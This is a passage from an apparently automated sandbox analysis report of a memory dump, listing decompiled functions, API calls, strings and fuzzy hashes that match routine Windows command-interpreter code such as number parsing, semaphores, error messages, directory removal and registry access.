						_a12 = _t55;
						if(_t55 == 0x7fffffff) {
							__imp___errno();
							__eflags =  *_t55 - 0x22;
							if( *_t55 != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					__eflags = _t71 - 0x58;
					if(_t71 != 0x58) {
						goto L5;
					}
					goto L24;
				}
				L5:
				_t55 = wcstol(_t54,  &_a8, 0);
				goto L6;
			}













                                  0x001564ea
                                  0x001564ef
                                  0x001564f2
                                  0x001564f8
                                  0x0016ac90
                                  0x0016ac90
                                  0x00156589
                                  0x0015658c
                                  0x00156591
                                  0x00156592
                                  0x00156593
                                  0x0015659a
                                  0x0015659a
                                  0x00156501
                                  0x001565cf
                                  0x001565d5
                                  0x001565d6
                                  0x001565d7
                                  0x001565d8
                                  0x001565d9
                                  0x001565e3
                                  0x001565e4
                                  0x001565e5
                                  0x001565e6
                                  0x001565ea
                                  0x0015665c
                                  0x00000000
                                  0x0015665c
                                  0x001565ef
                                  0x001565f4
                                  0x001565f7
                                  0x001565fb
                                  0x0016ac9c
                                  0x00156601
                                  0x00156604
                                  0x00156604
                                  0x00000000
                                  0x001565fb
                                  0x00156517
                                  0x00156624
                                  0x00156633
                                  0x00156634
                                  0x00156635
                                  0x00156636
                                  0x00156637
                                  0x00156641
                                  0x00156642
                                  0x00156643
                                  0x00156644
                                  0x00156648
                                  0x00000000
                                  0x00000000
                                  0x00156652
                                  0x00000000
                                  0x00156652
                                  0x0015651e
                                  0x00156527
                                  0x001565ac
                                  0x001565ae
                                  0x00000000
                                  0x001565b4
                                  0x001565bf
                                  0x00000000
                                  0x001565bf
                                  0x001565ae
                                  0x00156529
                                  0x00156531
                                  0x00156533
                                  0x0015653a
                                  0x00156609
                                  0x0015660d
                                  0x00156610
                                  0x0016aca8
                                  0x0016acae
                                  0x0015654c
                                  0x0015654f
                                  0x00156557
                                  0x0016acb9
                                  0x0016acbf
                                  0x0016acc2
                                  0x00000000
                                  0x00000000
                                  0x0016acc8
                                  0x00000000
                                  0x0016acc8
                                  0x0015655d
                                  0x0015656d
                                  0x0016acd4
                                  0x0016acd4
                                  0x00000000
                                  0x0015656d
                                  0x00156616
                                  0x00156619
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015661f
                                  0x00156540
                                  0x00156546
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                  • String ID: +-~!
                                  • API String ID: 2191331888-2604099254
                                  • Opcode ID: 1db0ce77d062487a1d2975e331153dd1c64a82588c549730d9861b21429ce876
                                  • Instruction ID: c93bc608c71a0bd0565a0aaacb2f7757ac33ae893079b20d2ba0ad43afb96a18
                                  • Opcode Fuzzy Hash: 1db0ce77d062487a1d2975e331153dd1c64a82588c549730d9861b21429ce876
                                  • Instruction Fuzzy Hash: CE517B71400209EBCB15DF68E8459AA37A5FF15362FA1811AFC269F180EB71DF58CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017213A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0017213A(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				void* _t16;
				long _t18;
				intOrPtr* _t41;
				void* _t44;

				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_t41 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t44, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t44, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												goto L22;
											} else {
												goto L24;
											}
										} else {
											goto L2;
										}
									}
								} else {
									goto L24;
								}
							} else {
								goto L2;
							}
						} else {
							if(ReleaseSemaphore(_t44, 1,  &_v8) != 0) {
								_v8 = _v8 + 1;
								if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
									goto L24;
								} else {
									L22:
									 *_t41 = _v8;
									_t16 = 0;
								}
							} else {
								goto L2;
							}
						}
					} else {
						L24:
						E0017292C("wil", 0x8000ffff);
						_t16 = 0x8000ffff;
					}
				} else {
					L2:
					_t16 = E00172913("wil");
				}
				return _t16;
			}











                                  0x0017213f
                                  0x00172140
                                  0x00172146
                                  0x0017214a
                                  0x0017214c
                                  0x00172155
                                  0x00172170
                                  0x00172183
                                  0x00172188
                                  0x001721ca
                                  0x001721d9
                                  0x001721e8
                                  0x001721fd
                                  0x00000000
                                  0x0017220c
                                  0x0017220e
                                  0x00172217
                                  0x00172225
                                  0x00000000
                                  0x00172227
                                  0x00000000
                                  0x00172227
                                  0x00172219
                                  0x00000000
                                  0x00172219
                                  0x00172217
                                  0x001721ea
                                  0x00000000
                                  0x001721ea
                                  0x001721db
                                  0x00000000
                                  0x001721db
                                  0x0017218a
                                  0x00172199
                                  0x001721a2
                                  0x001721b1
                                  0x00000000
                                  0x0017222e
                                  0x0017222e
                                  0x00172231
                                  0x00172233
                                  0x00172233
                                  0x0017219b
                                  0x00000000
                                  0x0017219b
                                  0x00172199
                                  0x00172179
                                  0x0017223c
                                  0x0017224a
                                  0x0017224f
                                  0x0017224f
                                  0x00172157
                                  0x0017215c
                                  0x00172164
                                  0x00172164
                                  0x00172257

                                  APIs
                                  • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,00172CF5), ref: 0017214C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ObjectSingleWait
                                  • String ID: wil
                                  • API String ID: 24740636-1589926490
                                  • Opcode ID: 370a15a35354d2dadf77c6bf7a3f7726cc65d1e602d5e9c6857ca9dc14d41a33
                                  • Instruction ID: 091d1a2dda206ea28c1e5ac7406a2ec29b2211583df092d93f9d44a9f138dc2b
                                  • Opcode Fuzzy Hash: 370a15a35354d2dadf77c6bf7a3f7726cc65d1e602d5e9c6857ca9dc14d41a33
                                  • Instruction Fuzzy Hash: CD31D534700204BBEB204BA69D84BBB3679EF41350F71C03AFA09D7682D771CD439662
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00177C83, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00177C83(void* __ebx, intOrPtr __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v12;
				char _v44;
				short _v112;
				short _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t29;
				void* _t33;
				signed int _t38;
				char* _t43;
				long _t46;
				void* _t47;
				intOrPtr _t59;
				signed int _t60;

				_t56 = __edx;
				_t47 = __ebx;
				_t24 =  *0x17d0b4; // 0x3dd0c51d
				_v12 = _t24 ^ _t60;
				_t59 = _a4;
				_v120 =  &_a16;
				_v116 = 0;
				_t29 = FormatMessageW(0x1900, 0, _a8, 0,  &_v116, 0xa,  &_v120);
				_v120 = 0;
				if(_t29 != 0) {
					L5:
					E00166B76(_t59, L"%s", _v116);
					_t56 =  *((intOrPtr*)(_t59 + 0x10));
					if(E0015BED7(_t59,  *((intOrPtr*)(_t59 + 0x10))) != 0) {
						E0015B6CB(_t59);
					}
					LocalFree(_v116);
					_t33 = 0;
				} else {
					__imp___ultoa(_a8,  &_v44, 0x10);
					_t38 = E00160638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t38),  &_v44, 0xffffffff,  &_v112, 0x20);
					_v128 =  &_v112;
					_t43 = L"Application";
					if(_a8 < 0x2328) {
						_t43 = L"System";
					}
					_v124 = _t43;
					_t46 = FormatMessageW(0x3100, 0, 0x13d, 0,  &_v116, 0xa,  &_v128);
					if(_t46 != 0) {
						goto L5;
					} else {
						_t33 = _t46 + 1;
					}
				}
				return E00166FD0(_t33, _t47, _v12 ^ _t60, _t56, 0, _t59);
			}





















                                  0x00177c83
                                  0x00177c83
                                  0x00177c8b
                                  0x00177c92
                                  0x00177c96
                                  0x00177c9d
                                  0x00177ca5
                                  0x00177cb9
                                  0x00177cbf
                                  0x00177cc4
                                  0x00177d3e
                                  0x00177d48
                                  0x00177d4d
                                  0x00177d59
                                  0x00177d5d
                                  0x00177d5d
                                  0x00177d65
                                  0x00177d6b
                                  0x00177cc6
                                  0x00177ccf
                                  0x00177ce0
                                  0x00177cef
                                  0x00177cf9
                                  0x00177d09
                                  0x00177d0c
                                  0x00177d11
                                  0x00177d13
                                  0x00177d13
                                  0x00177d18
                                  0x00177d31
                                  0x00177d39
                                  0x00000000
                                  0x00177d3b
                                  0x00177d3b
                                  0x00177d3b
                                  0x00177d39
                                  0x00177d7c

                                  APIs
                                  • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 00177CB9
                                  • _ultoa.MSVCRT ref: 00177CCF
                                  • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00177CD8
                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,0017A21D,000000FF,?,00000020), ref: 00177CF9
                                  • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00177D31
                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00177D65
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                  • String ID: (#$Application$System
                                  • API String ID: 3377411628-593978566
                                  • Opcode ID: 89d60c452a837c5c96762dbc6809b869b1ff0169680a2ca81da8d4cdf7037e6f
                                  • Instruction ID: 3df938d79a3f8477315a0e40210adee97511ff3562bff9b6bf523cb219a8ee1b
                                  • Opcode Fuzzy Hash: 89d60c452a837c5c96762dbc6809b869b1ff0169680a2ca81da8d4cdf7037e6f
                                  • Instruction Fuzzy Hash: A6317A31A00208AFDB219FA5DC05DEEBBB8FF98711F20412EF915EB191EB309A05CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00158885, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00158885(WCHAR* __ecx) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				WCHAR* _v20;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t15;
				signed int _t17;
				void* _t22;
				void* _t26;
				WCHAR* _t27;
				long _t28;
				signed int _t29;

				_t8 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t8 ^ _t29;
				_t27 = __ecx;
				_t28 = 0;
				if(GetFullPathNameW(__ecx, 4,  &_v16,  &_v20) == 3) {
					if(_v14 != 0x3a || _v12 != 0x5c) {
						goto L1;
					} else {
						_t15 = 0;
						L3:
						return E00166FD0(_t15, _t22, _v8 ^ _t29, _t26, _t27, _t28);
					}
				}
				L1:
				if(RemoveDirectoryW(_t27) == 0) {
					_t28 = GetLastError();
					if(_t28 == 5) {
						_t17 = GetFileAttributesW(_t27);
						if(_t17 != 0xffffffff && (_t17 & 0x00000001) != 0 && SetFileAttributesW(_t27, _t17 & 0xfffffffe) != 0) {
							if(RemoveDirectoryW(_t27) == 0) {
								_t28 = GetLastError();
							} else {
								_t28 = 0;
							}
						}
					}
				}
				_t15 = _t28;
				goto L3;
			}


















                                  0x0015888d
                                  0x00158894
                                  0x0015889c
                                  0x001588a2
                                  0x001588b1
                                  0x00170638
                                  0x00000000
                                  0x00170649
                                  0x00170649
                                  0x001588c8
                                  0x001588d7
                                  0x001588d7
                                  0x00170638
                                  0x001588b7
                                  0x001588c0
                                  0x00170656
                                  0x0017065b
                                  0x00170662
                                  0x0017066b
                                  0x00170695
                                  0x001706a4
                                  0x00170697
                                  0x00170697
                                  0x00170697
                                  0x00170695
                                  0x0017066b
                                  0x0017065b
                                  0x001588c6
                                  0x00000000

                                  APIs
                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,00158857,-00000105), ref: 001588A8
                                  • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,00158857,-00000105), ref: 001588B8
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,00158857,-00000105), ref: 00170650
                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,00158857,-00000105), ref: 00170662
                                  • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,00158857,-00000105), ref: 0017067E
                                  • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,00158857,-00000105), ref: 0017068D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                  • String ID: :$\
                                  • API String ID: 3961617410-1166558509
                                  • Opcode ID: d5d15fabb87a777bffd5f7c50c199a57ec3edb04c3f080bcbe50d82645620012
                                  • Instruction ID: a685bac624cf3d1e61b16329038a5e65f43e94e5ad9dd754842620844f58777d
                                  • Opcode Fuzzy Hash: d5d15fabb87a777bffd5f7c50c199a57ec3edb04c3f080bcbe50d82645620012
                                  • Instruction Fuzzy Hash: 4711E331A00114EB8721AB68DC4867E77BCEB89762B54422DFC36FA150EF708D85C2A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00162DD2, Relevance: 15.4, APIs: 10, Instructions: 400COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00162E1C
                                  • memset.MSVCRT ref: 00162E40
                                  • memset.MSVCRT ref: 00162E64
                                  • memset.MSVCRT ref: 00162E88
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00162F81
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00162F8E
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00162F9B
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00162FA5
                                    • Part of subcall function 00164E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00162F2C,-00000001,-00000001,-00000001,-00000001), ref: 00164ED6
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$BufferConsoleInfoScreen
                                  • String ID:
                                  • API String ID: 1034426908-0
                                  • Opcode ID: b19879c5e2647810bc29f58a9f0f08fb53c75696ecf9e77cf573e010829a7615
                                  • Instruction ID: c27c3fa9a81bcd540c98be77bda7cd5fe07652221ef03915d43b8432966c8a96
                                  • Opcode Fuzzy Hash: b19879c5e2647810bc29f58a9f0f08fb53c75696ecf9e77cf573e010829a7615
                                  • Instruction Fuzzy Hash: 88E1BC71A042199FDB24DF65DC85BAABBB5FF54304F1440A9E84997241EB31EEA0CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015BF30, Relevance: 15.3, APIs: 10, Instructions: 259COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0015BF80
                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 0015BFC6
                                  • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 0015BFE1
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0015BFF2
                                    • Part of subcall function 001629BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00160B22,00160B22,00007FE7), ref: 001629E9
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0015C00E
                                  • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 0015C0C0
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0015C0CA
                                  • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 0015C0E5
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0016A502
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                  • String ID:
                                  • API String ID: 402963468-0
                                  • Opcode ID: 47943cca6ba5b21680385b8a5904a6ca2739ec67f2e0f2caaa0a17ef83559839
                                  • Instruction ID: 183523c62b8d17c20ed80d33a148b36c2b64de7c9beb9a59930930cc4645f945
                                  • Opcode Fuzzy Hash: 47943cca6ba5b21680385b8a5904a6ca2739ec67f2e0f2caaa0a17ef83559839
                                  • Instruction Fuzzy Hash: 35810835A00316DEDB28DF59DC89A7AB7B4FF48701F54806AF915EB290EB708D84CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017396E, Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,00173B43,?,?,?,0017977C), ref: 0017398D
                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,00173B43,?,?,?,0017977C), ref: 001739A9
                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0017D620,?,?,00000000,?,00173B43,?,?,?,0017977C), ref: 001739BA
                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,00173B43,?,?,?,0017977C), ref: 001739C3
                                  • memcmp.MSVCRT ref: 00173A02
                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,00197F20,?,?,?,00173B43,?,?,?,0017977C), ref: 00173A93
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,00173B43,?,?,?,0017977C), ref: 00173ABE
                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,00173B43,?,?,?,0017977C), ref: 00173ACB
                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0017D621,00000001,0017977C,00000000,?,00173B43,?,?,?,0017977C), ref: 00173AE0
                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,00173B43,?,?,?,0017977C), ref: 00173AED
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                  • String ID:
                                  • API String ID: 2002953238-0
                                  • Opcode ID: 8b047b66d470c2ac046d81675fbda7386738a91a1356c50cb4871afdd844f959
                                  • Instruction ID: 602329af430242b4794cf3555dcd99e3eb5052dbc4dbfdfb534abb9adbb49bec
                                  • Opcode Fuzzy Hash: 8b047b66d470c2ac046d81675fbda7386738a91a1356c50cb4871afdd844f959
                                  • Instruction Fuzzy Hash: B4519472A05215AFDF218F68CC45BBDBBB9EF94710F14815AF969EB290C7708E80DB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015CDA2, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmp
                                  • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                  • API String ID: 2081463915-1668778490
                                  • Opcode ID: 88f5b137a4dda591e73085e108172d1b5090003f50794e55cd7a85b1b45a8e63
                                  • Instruction ID: 7be5a6ec51c03e945c1b26a35261359c2ffb62a81558c54cd61c3e7a6f403ea8
                                  • Opcode Fuzzy Hash: 88f5b137a4dda591e73085e108172d1b5090003f50794e55cd7a85b1b45a8e63
                                  • Instruction Fuzzy Hash: 0221B672604701DEEB3C1F39AC0772B6AD9EB553A2F20441FFC62891C1EF759988C295
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015D97E, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0015D9BE
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • _get_osfhandle.MSVCRT ref: 0015DAA6
                                  • _get_osfhandle.MSVCRT ref: 0015DAB7
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0015DB53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _get_osfhandlememset
                                  • String ID: DPATH
                                  • API String ID: 3784859044-2010427443
                                  • Opcode ID: 0cc855b3f5aff47203b32fb1b94ed13f1e4aa2301c97472fba74db7ed6665c2c
                                  • Instruction ID: b467619605aff2dc308c4bc566bdb5c4ec793887ccc7cef2d1503f6e9309883c
                                  • Opcode Fuzzy Hash: 0cc855b3f5aff47203b32fb1b94ed13f1e4aa2301c97472fba74db7ed6665c2c
                                  • Instruction Fuzzy Hash: BB912730A05212EFCB34EF64EC85A6AB7B2FF54311B254159E825DB291DB70ADA4CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001759E6, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 211registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00175AEF
                                  • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00175B7B
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00175BA2
                                  • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,001524AC,00000000,00000002,?,00000000), ref: 00175C13
                                  • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00175C4F
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00175C71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CloseValue$CreateDeleteOpen
                                  • String ID: %s=%s$\Shell\Open\Command
                                  • API String ID: 4081037667-3301834661
                                  • Opcode ID: 80afa9b598066c694b06d2e94db4e30f4e790424a4e01037b0e3b7ca3affcaf3
                                  • Instruction ID: ca0d47977a4aa943a180497cfd64618bb88a2e01355b82fd16399dd50fe3ea6a
                                  • Opcode Fuzzy Hash: 80afa9b598066c694b06d2e94db4e30f4e790424a4e01037b0e3b7ca3affcaf3
                                  • Instruction Fuzzy Hash: 2971FB71E407199BDB345F18CC85BF973BAEF54700F1481A9E81DA7290E7F19E848B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00176B30, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140COMMON
                                  Download Yara Rule
                                  APIs
                                  • towupper.MSVCRT ref: 00176B89
                                  • iswalpha.MSVCRT ref: 00176BBC
                                  • towupper.MSVCRT ref: 00176BCF
                                  • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00176C01
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00176C16
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00176C23
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                  • String ID: :\$%04X-%04X
                                  • API String ID: 4001382275-3541097225
                                  • Opcode ID: a0a47fdffd25e7d45b530b6715a899de7c148d82661741ed8051c758a39ccee5
                                  • Instruction ID: d4acd555fda5839c4e7b1c02995e73517d15921366ab7109e23cfcf0eda741a7
                                  • Opcode Fuzzy Hash: a0a47fdffd25e7d45b530b6715a899de7c148d82661741ed8051c758a39ccee5
                                  • Instruction Fuzzy Hash: AE410672604710AED720AF659C46EBB73FCDB98B11F04441EF999DB1C0EB709A84C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017587B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0017C0E0,00000018,00174B14,00000000,00000003), ref: 001758AF
                                  • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0017C0E0), ref: 001758E5
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0017C0E0,00000018,00174B14,00000000,00000003), ref: 001758F3
                                  • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,0017C0E0,00000018,00174B14,00000000,00000003), ref: 00175930
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0017C0E0,00000018,00174B14,00000000,00000003), ref: 0017594D
                                  • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,001524AC,?,00000000,02000000,?,?,?,00000000,00000000,0017C0E0,00000018,00174B14,00000000,00000003), ref: 00175974
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0017C0E0,00000018,00174B14,00000000,00000003), ref: 0017598F
                                  Strings
                                  Memory Dump Source
